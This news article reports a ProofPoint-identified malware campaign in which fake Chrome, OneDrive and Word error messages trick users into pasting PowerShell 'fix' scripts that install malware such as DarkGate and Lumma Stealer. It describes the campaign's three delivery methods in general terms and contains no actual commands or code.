The world of the internet and devices is never out of risk. Now, in this world comes another entrant that can swiftly trick many into unknowingly installing malware in their devices.
A novel malware distribution campaign is here, that makes use of fake Google Chrome, One Drive, and Word errors as a means to trick people into troubleshooting through PowerShell "fixes" and unknowingly installing malware.
Hackers are making use of JavaScript in hacked websites and email attachments. Fake error messages that resemble OneDrive, Microsoft Word, or Google Chrome alerts are now what the hackers make use of to trap the users. Messages like these urge users to tap on a button in order to copy a "fix script" in the clipboard of their devices. Then, users are instructed to paste this copied script in a "Run" dialog or the PowerShell prompt.
What makes this attack reliable is the sheer sophistication it demonstrates. Unlike other hacking techniques, users do not get hacked by simply or mistakenly clicking on a button. Here, the users are expected to follow certain steps, in order to "fix" the errors in their devices. The sophisticated multiple steps seem so genuine, that users mistakenly trust the process and fall in the trap. The steps make people believe that they are actually solving a genuine issue, much to their disappointment later on. All these hacks mislead the users to act without analyzing the risks. This has been said by a report by ProofPoint.
DarkGate, NetSupport, XMrig, Amadey Loader, Lumma Stealer, Matanbuchus, and a clipboard hijacker are some of the malicious software that ProofPoint identified.
The attacking methods
There are three distinct attack methods that have been identified. Each of these attacking methods start in a different manner.
In the very first method, users go to a compromised website. This method is related to the threat actors responsible for ClearFake. The site opens up a risky script hosted on the blockchain via the contracts of Binance's Smart Chain.
The script then scans for vulnerabilities. Next, the user finds a fake Google Chrome alert which says that there exists an issue in displaying the page. The user is then prompted by the alert to install a "root certificate". In order to do this, the user is prompted to copy a PowerShell script to the clipboard of Windows and run it in the Windows PowerShell (Admin) console.
Now that the PowerShell script is run, the script scans if the device is fit for the attack or not. It further installs the software that are significantly harmful.
The steps it follows are as follows:
1) Clearing up of the DNS cache.
2) Clearing the clipboard.
3) Displaying a fake message to distract.
4) Installs another PowerShell script through a remote server. The script then looks if it is actually running on a VM (virtual machine), prior to installing software to steal the data.
This is how the first attack is made.
ALSO READ: iOS 18 at WWDC 2024: A bunch of things to know
The second attack is called as the "ClickFix" campaign. This attack works by injecting codes into compromised sites. Now, this brings up fake Google Chrome error alerts. Obviously, such alerts overlaying the page are enough to worry any user of errors. In order to fix these errors, the users are guided to kickstart "Windows PowerShell (Admin). Now, they are instructed to paste a certain code. These leads to devices to get infected.
The third method is enough to trap possibly anyone. The third method makes use of email attachments. Now, these email attachments look quite similar to Microsoft Word documents. Users are urged to download a "Word Online" extension to view those documents properly. Once the users get stuck in this situation, they are provided with prompts such as "Auto fix" or "How to fix". The option of "Auto-fix" makes use of a protocol that unveils a remote file that is controlled by attackers. This can further install and run harmful files such as VBS or MSI scripts. These further cause malware like DarkGate or Matanbuchus to infect the devices. The option of "How to Fix" urges the user to copy a PowerShell command and paste it into PowerShell.
No matter what the method, the aim of the attackers is often filled with malice. Attackers see the lack of knowledge among users as an opportunity to exploit them.
ALSO READ: Ariana Grande Joins Weverse: What is the "Super App"?
ALSO READ: What is "Space Bug"?
-1754840299611.jpg)
-1754836317035.jpg)
-1754825405965.jpg)
Comments
All Comments (0)
Join the conversation